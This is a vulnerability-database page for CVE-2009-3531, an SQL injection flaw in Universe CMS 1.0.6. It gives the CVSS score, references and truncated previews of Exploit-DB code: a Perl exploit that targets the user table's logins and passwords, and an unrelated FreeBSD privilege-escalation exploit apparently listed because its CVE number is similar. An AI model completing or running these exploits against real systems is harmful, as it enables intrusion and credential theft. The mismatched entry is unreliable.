CVE-2009-3531
Published 2009-10-02
CVE-2009-3531: SQL injection vulnerability in vnews.php in Universe CMS 1.0.6 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority P3 41 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.02% (59.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| universe | universe_cms | — | — |
No detection rules found.
Exploit-DB
Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection
exploitdb·2009-07-09
CVE-2009-3531 Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection
---
```perl
#!/usr/bin/perl -w
# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit
# Demo : http://www.universe.uni.org.pl
# Download : http://www.universe.uni.org.pl/upload/universecms106.rar
# Found by : Mr.tro0oqy
# E-mail : [email protected]
# special thank for my teacher "Stack"
########################################
system("color e");
print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
print "\t\t0 Universe CMS 1.0.6 (id) Remote SQL Injection Exploit 0\n\n";
print "\t\t0 by Mr.tro0oqy 0\n\n";
print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://target.com/path \n" unless @ARGV;
$user="login";
$pass="password";
$tab="uni_users";
$b = LWP:
```
Exploit-DB
FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
exploitdb·2009-07-09·CVSS 6.9
CVE-2008-3531 [MEDIUM] FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
---
```c
/*
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
*
* For a detailed analysis see:
*
* http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
*
* Sample run:
*
* [argp@leon ~]$ uname -rsi
* FreeBSD 7.0-RELEASE GENERIC
* [argp@leon ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@leon ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
* [argp@leon ~]$ ./cve-2008-3531
* [*] vptr = 0x006e776f
* [*
```
No writeups or analysis indexed.
http://packetstormsecurity.org/0907-exploits/universecms-sql.txt
http://secunia.com/advisories/35737
http://www.exploit-db.com/exploits/9099
http://www.osvdb.org/55761
https://exchange.xforce.ibmcloud.com/vulnerabilities/51621
2009-10-02
Published